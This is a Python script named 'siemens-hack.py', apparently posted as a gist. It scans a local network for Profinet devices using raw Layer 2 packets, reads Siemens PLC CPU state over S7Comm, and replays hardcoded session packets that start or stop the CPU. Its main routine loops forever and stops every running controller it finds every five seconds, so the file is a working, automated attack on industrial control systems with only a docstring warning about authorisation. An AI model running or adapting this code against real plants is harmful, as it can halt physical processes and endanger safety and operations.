Files
Gist/siemens-hack.py
2024-09-02 19:26:16 +02:00

485 lines
22 KiB
Python

#! /usr/bin/env python3
r"""
Copyright 2022 Photubias(c)
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
(Buggy) Linux implementation of this script: https://code.google.com/p/scada-tools/
python profinet_scanner.py [-i interface]
DLL Library import based on: https://code.google.com/p/winpcapy/
Prerequisites: WinPcap (Windows) or libpcap (Linux) installed
File name SiemensScan.py
written by tijl[dot]deneut[at]howest[dot]be for IC4
--- Profinet Scanner ---
It will perform a Layer2 discovery scan (PN_DCP) for Profinet devices,
then list their info (detected only via DCP)
Then give you the option to change network settings for any of them
--- Siemens Hacker ---
It also performs detailed scanning using S7Comm.
Furthermore, this script reads inputs AND writes & reads outputs.
"""
import os
import re
import socket
import string
import struct
import sys
import time
from binascii import hexlify, unhexlify
from ctypes import CDLL, POINTER, Structure, c_void_p, c_char_p, c_ushort, c_char, c_long, c_int, c_ubyte, \
byref, create_string_buffer
from ctypes.util import find_library
from multiprocessing.pool import ThreadPool
from pprint import pprint
from subprocess import Popen, PIPE
##### Classes
class Sockaddr(Structure):
    """ctypes layout of the generic socket address that PcapAddr entries point to."""

    _fields_ = [
        ("sa_family", c_ushort),   # address family identifier
        ("sa_data", c_char * 14),  # 14 raw, family-specific address bytes
    ]
class PcapAddr(Structure):
    """One node of the linked list of addresses attached to a pcap interface."""


# The node refers to its own type through 'next', so the field layout can only
# be attached after the class object exists.
PcapAddr._fields_ = [
    ("next", POINTER(PcapAddr)),       # following node in the list
    ("addr", POINTER(Sockaddr)),
    ("netmask", POINTER(Sockaddr)),
    ("broadaddr", POINTER(Sockaddr)),
    ("dstaddr", POINTER(Sockaddr)),
]
class PcapIf(Structure):
    """One node of the linked list of capture devices (see pcap_findalldevs below)."""


# Self-referential through 'next', hence the layout is assigned after the
# class statement.
PcapIf._fields_ = [
    ("next", POINTER(PcapIf)),          # following device in the list
    ("name", c_char_p),
    ("description", c_char_p),
    ("addresses", POINTER(PcapAddr)),   # head of this device's address list
    ("flags", c_int),
]
class Timeval(Structure):
    """Timestamp split into whole seconds and microseconds, both C longs."""

    _fields_ = [
        ("tv_sec", c_long),
        ("tv_usec", c_long),
    ]
class PcapPkthdr(Structure):
    """Per-packet header that pcap_next_ex fills in for every delivered packet."""


PcapPkthdr._fields_ = [
    ("ts", Timeval),     # timestamp of the packet
    ("caplen", c_int),   # per libpcap's pcap_pkthdr: number of bytes actually captured
    ("len", c_int),      # per libpcap's pcap_pkthdr: length of the packet on the wire
]
##### Initialize Pcap
# Load the platform's packet-capture library into `_lib`. Every pcap binding
# further down hangs off this handle, so a missing library ends the program
# with an installation hint.
if os.name == 'nt':
    try:
        # NOTE: this changes the working directory of the whole process to the
        # Npcap directory before loading wpcap.dll by its bare name.
        os.chdir('C:/Windows/System32/Npcap')
        _lib = CDLL('wpcap.dll')
    except OSError:
        # Both a missing directory (os.chdir) and an unloadable DLL (CDLL)
        # surface as OSError; anything else is a real bug and should not be
        # hidden behind the "not found" message.
        print('Error: WinPcap/Npcap not found!')
        print('Please download here: https://nmap.org/npcap/')
        input('Press [Enter] to close')
        sys.exit(1)
else:
    pcaplibrary = find_library('pcap')
    if not pcaplibrary:  # find_library returns None when nothing was located
        print('Error: Pcap library not found!')
        print('Please install with: e.g. apt install libpcap0.8')
        input('Press [Enter] to close')
        sys.exit(1)
    _lib = CDLL(pcaplibrary)
## Bind the pcap functions this script uses and declare their argument and
## return types, so ctypes converts values correctly on every call.

## List all capture devices: (out) head of the PcapIf list, error buffer
pcap_findalldevs = _lib.pcap_findalldevs
pcap_findalldevs.argtypes = (POINTER(POINTER(PcapIf)), c_char_p)
pcap_findalldevs.restype = c_int

## Open a device for capturing/sending. Arguments, in order:
##   device  - name of the capture device
##   snaplen - maximum size of packets to capture, in bytes
##   promisc - put the card in promiscuous mode?
##   to_ms   - time to wait for packets, in milliseconds, before a read times out
##   errbuf  - receives the error string if something goes wrong
pcap_open_live = _lib.pcap_open_live
pcap_open_live.argtypes = (c_char_p, c_int, c_int, c_int, c_char_p)
pcap_open_live.restype = POINTER(c_void_p)

## Send a raw packet: pcap device handle, packet data, packet length
pcap_sendpacket = _lib.pcap_sendpacket
pcap_sendpacket.argtypes = (POINTER(c_void_p), POINTER(c_ubyte), c_int)
pcap_sendpacket.restype = c_int

## Close a device handle
pcap_close = _lib.pcap_close
pcap_close.argtypes = (POINTER(c_void_p),)
pcap_close.restype = None

## Fetch the error message belonging to a device handle
pcap_geterr = _lib.pcap_geterr
pcap_geterr.argtypes = (POINTER(c_void_p),)
pcap_geterr.restype = c_char_p

## Fetch the next packet: device handle, (out) packet header, (out) packet data
pcap_next_ex = _lib.pcap_next_ex
pcap_next_ex.argtypes = (POINTER(c_void_p), POINTER(POINTER(PcapPkthdr)), POINTER(POINTER(c_ubyte)))
pcap_next_ex.restype = c_int
##### Variables
# Number of seconds scan_network() listens for PN-DCP replies after it has sent the discovery packet
iDiscoverTimeout = 2
##### Functions
def get_all_interfaces():
    """Enumerate the local network interfaces that have a usable MAC address.

    On Windows the data comes from ``getmac`` and ``netsh``; elsewhere from the
    ``ip address`` command. Interfaces whose MAC string is not exactly 17
    characters long (e.g. PPP adapters) are left out.

    Returns:
        A list holding one five-element list per interface:
            [0] adapter name (e.g. Ethernet or eth0)
            [1] current IP (e.g. 192.168.0.2; '' on Windows when none was found)
            [2] current MAC (e.g. ff:ee:dd:cc:bb:aa)
            [3] device name (e.g. Intel 82575LM; Windows only, '' elsewhere)
            [4] device GUID (e.g. {875F7EDB-CA23-435E-8E9E-DFC9E3314C55};
                Windows only, '' elsewhere)
    """
    def add_to_arr(array, adapter, ip, mac, device, winguid):
        # When no or bad MAC address (e.g. PPP adapter), do not add
        if len(mac) == 17:
            array.append([adapter, ip, mac, device, winguid])
        return array

    interfaces = []
    if os.name == 'nt':  # This should work on Windows
        # The context manager closes the pipe and reaps the child process.
        with Popen("getmac /NH /V /FO csv | FINDSTR /V disconnected", shell=True, stdout=PIPE) as proc:
            getmac_lines = proc.stdout.readlines()
        for interface in getmac_lines:
            # Console output is not guaranteed to be UTF-8; undecodable bytes
            # are dropped rather than aborting the whole enumeration.
            intarr = interface.decode(errors='ignore').split(',')
            if len(intarr) < 4:
                continue  # blank or malformed row, nothing to extract
            adapter = intarr[0].replace('"', '')
            devicename = intarr[1].replace('"', '')
            mac = intarr[2].replace('"', '').lower().replace('-', ':')
            # The GUID (including braces) is the last 38 characters of the transport name
            winguid = intarr[3].replace('"', '').replace('\n', '').replace('\r', '')[-38:]
            # NOTE(review): the adapter name is interpolated into a shell command line.
            with Popen('netsh int ip show addr "' + adapter + '" | FINDSTR /I IP', shell=True,
                       stdout=PIPE) as proc:
                netsh_lines = proc.stdout.readlines()
            try:
                ip = re.findall(r'[0-9]+(?:\.[0-9]+){3}',
                                netsh_lines[0].decode(errors='ignore').replace(' ', ''))[0]
            except IndexError:
                # No output line at all, or no dotted quad in the first line
                ip = ''
            interfaces = add_to_arr(interfaces, adapter, ip, mac, devicename, winguid)
    else:  # And this on any Linux
        # Prints one "<name> <ipv4> <mac>" line per interface reported by `ip address`
        with Popen(
                "for i in $(ip address | grep -v \"lo\" | grep \"default\" | cut -d\":\" -f2 | cut -d\" \" -f2);do echo $i $(ip address show dev $i | grep \"inet \" | cut -d\" \" -f6 | cut -d\"/\" -f1) $(ip address show dev $i | grep \"ether\" | cut -d\" \" -f6);done",
                shell=True, stdout=PIPE) as proc:
            ip_lines = proc.stdout.readlines()
        for interface in ip_lines:
            intarr = interface.decode().split(' ')
            if len(intarr) < 3:
                # A lookup produced no output (no IPv4 address or no MAC):
                # Layer 2 scanning is not an option on this interface
                continue
            interfaces = add_to_arr(interfaces, intarr[0], intarr[1], intarr[2].replace('\n', ''), '', '')
    return interfaces
def create_packet(s_data):
    """Turn a hex string such as '01020304050607' into a ctypes array of unsigned bytes.

    The returned ``c_ubyte`` array holds one element per decoded byte and can be
    handed directly to pcap_sendpacket.
    """
    raw_bytes = unhexlify(s_data)
    packet_type = c_ubyte * len(raw_bytes)
    # Iterating over bytes yields ints, which initialise the array element by element
    return packet_type(*raw_bytes)
def send_raw_packet(b_npfdevice, s_ethertype, s_srcmac, bool_set_network=False, s_network_data_to_set='', s_dstmac=''):
    """Build an Ethernet frame for the given ethertype and send it through pcap.

    Args:
        b_npfdevice: pcap device name as bytes.
        s_ethertype: ethertype as four hex characters; selects the payload:
            '88cc' - fixed LLDP packet (destination MAC is overridden)
            '8100' - PN-DCP discovery packet (destination MAC is overridden)
            '8892' - PN-DCP packet built from s_network_data_to_set
        s_srcmac: source MAC as 12 hex characters (no separators).
        bool_set_network: for '8892' only; when true, s_network_data_to_set is
            wrapped in a "set network data" request, otherwise it is sent as
            the complete payload.
        s_network_data_to_set: hex string, see bool_set_network.
        s_dstmac: destination MAC as 12 hex characters; used for '8892' only.

    Returns:
        The frame that was sent, as a ctypes c_ubyte array.

    Raises:
        ValueError: if s_ethertype is not one of the supported values.

    Exits the program (status 1) when the device cannot be opened or the
    packet cannot be sent.
    """
    if s_ethertype == '88cc':  # LLDP Packet
        s_dstmac = '0180c200000e'
        s_data = '0210077365727665722d6e6574776f726b6d040907706f72742d303031060200140a0f5345525645522d4e4554574f524b4d0c60564d776172652c20496e632e20564d77617265205669727475616c20506c6174666f726d2c4e6f6e652c564d776172652d34322033362036642039622034302062642038642038302d66302037362061312066302035332030392039352032370e040080008010140501ac101e660200000001082b0601040181c06efe08000ecf0200000000fe0a000ecf05005056b6feb6fe0900120f0103ec0300000000'
    elif s_ethertype == '8100':  # PN-DCP, Profinet Discovery Packet
        s_dstmac = '010ecf000000'
        s_data = '00008892fefe05000400000300800004ffff00000000000000000000000000000000000000000000000000000000'
    elif s_ethertype == '8892':
        if bool_set_network:
            ## Create packet to set networkdata, expect data in hexstring
            s_data = (
                'fefd 04 00 04000001 0000 0012 0102 000e 0001' + s_network_data_to_set + '0000 0000 0000 0000 0000 0000'
            ).replace(' ', '')
        else:
            ## Custom packet: s_network_data_to_set is the data (including length), s_dstmac the destination
            s_data = s_network_data_to_set
    else:
        # Previously this fell through and failed later on an unbound local
        raise ValueError('Unsupported ethertype: {!r}'.format(s_ethertype))

    ## Get packet as a ctypes byte array
    arr_byte_packet = create_packet(s_dstmac + s_srcmac + s_ethertype + s_data)

    ## Send the packet
    buf_errbuf = create_string_buffer(256)
    ## Device, max packet size, promiscuous mode, time limit in ms, buffer for errors
    handle_pcap_dev = pcap_open_live(b_npfdevice, 65535, 1, 1000, buf_errbuf)
    if not bool(handle_pcap_dev):
        print('\nError: Please use sudo!\n')
        # Missing privileges are only the most likely cause; also show what pcap reported
        s_detail = buf_errbuf.value.decode(errors='ignore')
        if s_detail:
            print(s_detail)
        sys.exit(1)
    try:
        if pcap_sendpacket(handle_pcap_dev, arr_byte_packet, len(arr_byte_packet)) != 0:
            # pcap_geterr returns bytes (or None); read it before the handle is closed
            s_error = (pcap_geterr(handle_pcap_dev) or b'').decode(errors='ignore')
            print('\nError sending the packet: %s\n' % s_error)
            sys.exit(1)
    finally:
        # Release the device on the error path as well
        pcap_close(handle_pcap_dev)
    return arr_byte_packet
def receive_raw_packets(b_npfdevice, i_timeout, s_srcmac, s_ethertype, stop_on_receive=False):
    """Capture frames of one ethertype that are addressed to a given MAC.

    Args:
        b_npfdevice: pcap device name as bytes.
        i_timeout: how long to listen, in seconds.
        s_srcmac: our own MAC as 12 hex characters; a frame is kept when its
            destination MAC (first six bytes) equals this value.
        s_ethertype: ethertype to keep, as four hex characters (bytes 12-13 of the frame).
        stop_on_receive: return as soon as the first matching frame was seen.

    Returns:
        A list of matching frames, each a list of byte values (ints).

    Exits the program (status 1) when the device cannot be opened.
    """
    arr_received_raw_data = []
    buf_errbuf = create_string_buffer(256)
    ## Device, max packet size, promiscuous mode, time limit in ms, buffer for errors
    handle_pcap_dev = pcap_open_live(b_npfdevice, 65535, 1, 1000, buf_errbuf)
    if not bool(handle_pcap_dev):
        print('\nUnable to open the adapter. {} is not supported by Pcap\n'.format(b_npfdevice))
        sys.exit(1)

    ptr_header = POINTER(PcapPkthdr)()
    ptr_pkt_data = POINTER(c_ubyte)()
    s_wanted_type = s_ethertype.lower()
    s_wanted_mac = s_srcmac.lower()
    fl_deadline = time.time() + int(i_timeout)
    i_packets = 0
    try:
        while True:
            i_result = pcap_next_ex(handle_pcap_dev, byref(ptr_header), byref(ptr_pkt_data))
            if i_result < 0:
                break  ## Error reported by pcap
            i_timeleft = int(round(fl_deadline - time.time(), 0))
            status('Received packets: %s, time left: %i \r' % (str(i_packets), i_timeleft))
            if i_timeleft <= 0:
                break  ## Regular timeout elapsed
            if i_result != 1:
                # 0 means the read timeout expired without a packet: header and
                # data pointers are not valid then, so they must not be touched
                continue
            i_packets += 1
            # caplen is the number of bytes actually present in the capture buffer
            lst_rawdata = ptr_pkt_data[0:ptr_header.contents.caplen]
            s_packettype = hexlify(bytearray(lst_rawdata[12:14])).decode().lower()
            s_targetmac = hexlify(bytearray(lst_rawdata[:6])).decode().lower()
            if s_packettype == s_wanted_type and s_targetmac == s_wanted_mac:
                arr_received_raw_data.append(lst_rawdata)
                if stop_on_receive:
                    break
    finally:
        # Always release the capture handle, even when parsing raises
        pcap_close(handle_pcap_dev)
    return arr_received_raw_data
def _dcp_block_text(block, block_length):
    """Return the text carried by a DCP block, with NUL bytes removed.

    The bytes are rendered through their repr, so non-printable bytes show up
    as escape sequences instead of raw control characters.
    """
    raw = unhexlify(block[4 * 2:4 * 2 + block_length * 2])
    return str(raw)[2:-1].replace(r'\x00', '')


def parse_response(s_hexdata, s_mac):
    """Parse the raw PN_DCP data of a discovery (identify) response.

    Based on https://code.google.com/p/scada-tools/source/browse/profinet_scanner.py

    Args:
        s_hexdata: frame content after the 14-byte Ethernet header, as a hex
            string; expected to start with the Profinet FrameID 'feff'.
        s_mac: MAC address of the responding device, stored as-is in the result.

    Returns:
        A dict with the keys mac_address, type_of_station, name_of_station,
        vendor_id, device_id, device_role, ip_address, subnet_mask,
        standard_gateway (string 'None' when the response did not carry the
        value) plus hardware and firmware (always None here). When the data
        does not start with 'feff', a message is printed and the dict is
        returned with its defaults.
    """
    arr_device = {
        'mac_address': s_mac,
        'type_of_station': 'None',
        'name_of_station': 'None',
        'vendor_id': 'None',
        'device_id': 'None',
        'device_role': 'None',
        'ip_address': 'None',
        'subnet_mask': 'None',
        'standard_gateway': 'None',
        'hardware': None,
        'firmware': None,
    }
    ## Since this is the parse of a DCP identify response, data should start with feff (Profinet FrameID 0xFEFF)
    if str(s_hexdata[:4]).lower() != 'feff':
        print('Error: this data is not a proper DCP response?')
        return arr_device

    data_to_parse = s_hexdata[24:]  # (Static) offset to where first block starts
    # A block needs at least its 4-byte header (id + length); leftover bytes
    # shorter than that (e.g. frame padding) are ignored instead of crashing.
    while len(data_to_parse) >= 4 * 2:
        ## Data is divided into blocks, where block length is set at byte 2 & 3 (so offset [4:8]) of the block
        block_length = int(data_to_parse[2 * 2:4 * 2], 16)
        block_end = (4 + block_length) * 2
        block = data_to_parse[:block_end]
        if len(block) < block_end:
            break  # block announces more data than the frame contains

        ## Parse the block
        block_id = str(block[:2 * 2])
        if block_id == '0201':
            arr_device['type_of_station'] = _dcp_block_text(block, block_length)
        elif block_id == '0202':
            arr_device['name_of_station'] = _dcp_block_text(block, block_length)
        elif block_id == '0203':
            arr_device['vendor_id'] = str(block[6 * 2:8 * 2])
            arr_device['device_id'] = str(block[8 * 2:10 * 2])
        elif block_id == '0204':
            arr_device['device_role'] = str(block[6 * 2:7 * 2])
        elif block_id == '0102' and block_length >= 14:
            # 2 leading bytes + 3 x 4 address bytes are required for IP, mask and gateway
            arr_device['ip_address'] = socket.inet_ntoa(struct.pack(">L", int(block[6 * 2:10 * 2], 16)))
            arr_device['subnet_mask'] = socket.inet_ntoa(struct.pack(">L", int(block[10 * 2:14 * 2], 16)))
            arr_device['standard_gateway'] = socket.inet_ntoa(struct.pack(">L", int(block[14 * 2:18 * 2], 16)))

        ## Maintain the loop: blocks of odd length are followed by one padding byte
        padding = block_length % 2
        data_to_parse = data_to_parse[(4 + block_length + padding) * 2:]
    return arr_device
def status(msg):
    """Write msg to standard error exactly as given (no newline added) and flush at once."""
    err_stream = sys.stderr
    err_stream.write(msg)
    err_stream.flush()
def send_and_recv(sock, strdata, sendOnly=False):
    """Send a hex-encoded message over sock and return the reply.

    Args:
        sock: connected socket.
        strdata: message as a hex string; spaces are ignored and case does not matter.
        sendOnly: when true, do not wait for a reply.

    Returns:
        The bytes of a single recv() call (at most 65000 bytes), or None when
        sendOnly is true.
    """
    data = unhexlify(strdata.replace(' ', '').lower())  ## Convert to real HEX (\x00\x00 ...)
    # sendall() keeps writing until the whole buffer is out; send() may stop early
    sock.sendall(data)
    if sendOnly:
        return None
    return sock.recv(65000)
def get_cpu(device):
    """Ask a device for its CPU state over S7Comm (TCP port 102).

    Args:
        device: dict with at least the key 'ip_address'.

    Returns:
        'Unknown' - the TCP connection could not be established
        ''        - the COTP connection request was not confirmed
        'Stopped' - byte 44 of the read response equals 0x03
        'Running' - any other read response (including a too short one)

    Raises:
        OSError: when the exchange fails after the connection was established
            (e.g. a receive timeout); the socket is closed in every case.
    """
    # The context manager closes the socket on every exit path
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock.settimeout(1)  # 1 second timeout
        try:
            sock.connect((device['ip_address'], 102))  ## Will setup TCP/SYN with port 102
        except OSError:
            # Refused, unreachable, timed out or unresolvable address
            return 'Unknown'

        # Firstly: the COTP Connection Request (CR), should result in Connection Confirm (CC)
        ## TPKT header + COTP CR TPDU with src-ref 0x0005 (gets response with dst-ref 0x0005)
        cotpconnectresponse = hexlify(
            send_and_recv(sock, '03000016' + '11e00000001d00c1020100c2020100c0010a')).decode(errors='ignore')
        ## Response should be 03000016 11d00005001000c0010ac1020600c2020600
        if cotpconnectresponse[10:12] != 'd0':
            print('COTP Connection Request failed')
            return ''

        ##---- S7 Setup Comm ------------
        ## TPKT header + COTP header + S7 data (which is: Header -Job- + Parameter -Setup-)
        s7setupdata = '32010000020000080000' + 'f0000001000101e0'
        # Total length in bytes: the 7 header bytes (14 hex characters) plus the S7 data
        tpktlength = format((len(s7setupdata) + 14) // 2, '02x')
        send_and_recv(sock, '030000' + tpktlength + '02f080' + s7setupdata)

        ##---- S7 Request CPU -----------
        s7readdata = '3207000005000008 000800011204 11440100ff09000404240001'
        tpktlength = format((len(s7readdata.replace(' ', '')) + 14) // 2, '02x')
        s7read = send_and_recv(sock, '030000' + tpktlength + '02f080' + s7readdata)
        if hexlify(s7read[44:45]).decode(errors='ignore') == '03':
            return 'Stopped'
        return 'Running'
def change_cpu(device):
    """Toggle the CPU state of a device: start it when stopped, stop it otherwise.

    NOTE: this changes the operating state of a live controller.

    The current state is taken from get_cpu(); only 'Stopped' selects the start
    request, every other result (including 'Unknown' and '') selects the stop
    request.

    Args:
        device: dict with at least the key 'ip_address'.

    Returns:
        True when the whole exchange was sent, False when the request that
        follows the "Getting data" phase failed.

    Raises:
        OSError: when connecting or one of the other exchanges fails (e.g. a
            timeout); the socket is closed in every case.
    """
    cur_state = get_cpu(device)
    b_start = cur_state == 'Stopped'  ## Stopped: will perform start, otherwise stop

    # The context manager closes the socket on every exit path
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock.settimeout(1)
        sock.connect((device['ip_address'], 102))  ## Will setup TCP/SYN with port 102
        ## CR TPDU
        send_and_recv(sock, '03000016' + '11e00000002500c1020600c2020600c0010a')
        ## 'SubscriptionContainer'
        sResp = hexlify(send_and_recv(sock,
                                      '030000c0' + '02f080' + '720100b131000004ca0000000200000120360000011d00040000000000a1000000d3821f0000a3816900151653657276657253657373696f6e5f4536463534383534a3822100150b313a3a3a362e303a3a3a12a3822800150d4f4d532b204465627567676572a38229001500a3822a001500a3822b00048480808000a3822c001211e1a300a3822d001500a1000000d3817f0000a38169001515537562736372697074696f6e436f6e7461696e6572a2a20000000072010000')).decode(
            errors='ignore')
        # Session id: byte 24 of the response plus 0x80 (the '0' prefix keeps int() valid on a short response)
        s_sid = str(hex(int('0' + sResp[48:50], 16) + int('80', 16))).replace('0x', '')
        if len(s_sid) % 2 == 1:
            s_sid = '0' + s_sid

        # The start and stop requests differ in a single byte
        s_request_byte = 'ce' if b_start else '88'
        send_and_recv(sock,
                      '03000078' + '02f080' + '72020069310000054200000003000003' + s_sid + '34000003 ' + s_request_byte + ' 010182320100170000013a823b00048140823c00048140823d000400823e00048480c040823f0015008240001506323b313035388241000300030000000004e88969001200000000896a001300896b000400000000000072020000')
        send_and_recv(sock,
                      '0300002b' + '02f080' + '7202001c31000004bb00000005000003' + s_sid + '34000000010000000000000000000072020000')
        send_and_recv(sock,
                      '0300002b' + '02f080' + '7202001c31000004bb00000006000003' + s_sid + '34000000020001010000000000000072020000')

        print('--- Getting data ---')
        # Drain whatever the device still sends until it stays quiet for the socket timeout
        while True:
            try:
                if not sock.recv(65000):
                    # Empty read: the peer closed the connection. recv() would keep
                    # returning b'' immediately, so stop instead of spinning forever.
                    break
            except OSError:
                break  # timeout (or connection error): nothing more to read

        try:
            send_and_recv(sock,
                          '03000042' + '02f080' + '7202003331000004fc00000007000003' + s_sid + '360000003402913d9b1e000004e88969001200000000896a001300896b00040000000000000072020000')
        except OSError:
            return False

        s_state_byte = '03' if b_start else '01'
        send_and_recv(sock,
                      '03000043' + '02f080' + '7202003431000004f200000008000003' + s_sid + '36000000340190770008 ' + s_state_byte + ' 000004e88969001200000000896a001300896b00040000000000000072020000')
        send_and_recv(sock,
                      '0300003d' + '02f080' + '7202002e31000004d40000000a000003' + s_sid + '34000003d000000004e88969001200000000896a001300896b000400000000000072020000')
        return True
def scan_network(s_adapter, s_macaddr, s_winguid):
    """Send one PN-DCP discovery packet and collect the responses.

    Args:
        s_adapter: adapter name (e.g. 'eth0'); used as pcap device name except on Windows.
        s_macaddr: own MAC address as 12 hex characters.
        s_winguid: adapter GUID including braces; only used on Windows.

    Returns:
        A tuple (list of received raw packets, pcap device name as bytes).
    """
    ## We use Pcap, so we need the Pcap device (for Windows: \Device\NPF_{GUID}, for Linux: 'eth0')
    pcap_name = r'\Device\NPF_' + s_winguid if os.name == 'nt' else s_adapter
    b_npfdevice = pcap_name.encode()

    ## Sending the raw packet (packet itself is returned) (8100 == PN_DCP, 88cc == LDP)
    print('Building packet')
    sent_frame = send_raw_packet(b_npfdevice, '8100', s_macaddr)
    print(f'\nPacket has been sent ({len(sent_frame)} bytes)')

    ## Receiving packets (88cc == LDP, 8892 == device PN_DCP)
    print(f'\nReceiving packets over {iDiscoverTimeout} seconds ...\n')
    captured = receive_raw_packets(b_npfdevice, iDiscoverTimeout, s_macaddr, '8892')
    print()
    print(f'\nSaved {len(captured)} packets')
    print()
    return captured, b_npfdevice
def parse_data(received_data_arr):
    """Turn captured raw packets into device dictionaries.

    For every packet the source MAC (bytes 6-11 of the frame) is formatted with
    ':' separators, and everything after the 14-byte Ethernet header is handed
    to parse_response together with that MAC.

    Args:
        received_data_arr: iterable of raw packets, each a sequence of byte values.

    Returns:
        A list with one parse_response() result per packet, in input order.
    """
    lst_devices = []
    for frame in received_data_arr:
        frame_hex = hexlify(bytearray(frame)).decode(errors='ignore')
        ## Getting MAC address from packet, formatting with ':' in between
        mac_hex = frame_hex[6 * 2:12 * 2]
        s_mac = ':'.join(mac_hex[pos:pos + 2] for pos in range(0, len(mac_hex), 2))
        ## 28 hex characters == 14 bytes: take off ethernet header
        lst_devices.append(parse_response(frame_hex[28:], s_mac))
    return lst_devices
def main():
    """Scan for Profinet devices on the first usable interface and stop every running CPU, forever.

    WARNING: every device whose CPU reports 'Running' is sent a state change
    (stop) request, and the scan repeats every 5 seconds until the process is
    interrupted. Only run this against equipment you are authorised to test.

    Exits with status 1 when no usable network interface is found.
    """
    interfaces = get_all_interfaces()
    if not interfaces:
        # Without this check the indexing below fails with an IndexError
        print('Error: no usable network interface found')
        sys.exit(1)

    first_interface = interfaces[0]
    s_adapter = first_interface[0]  # eg: 'Ethernet 2'
    s_macaddr = first_interface[2].replace(':', '')  # eg: 'ab58e0ff585a'
    s_winguid = first_interface[4]  # eg: '{875F7EDB-CA23-435E-8E9E-DFC9E3314C55}'

    while True:
        # The pcap device name returned alongside the packets is not needed here
        received_data_arr, _ = scan_network(s_adapter, s_macaddr, s_winguid)
        lst_devices = parse_data(received_data_arr)
        print(f"Found {len(lst_devices)} devices")
        for lst_device in lst_devices:
            pprint(lst_device)

        print("Stopping all CPUs")
        for device in lst_devices:
            current_state = get_cpu(device)
            if current_state == 'Running':
                change_cpu(device)
        time.sleep(5)
if __name__ == '__main__':
main()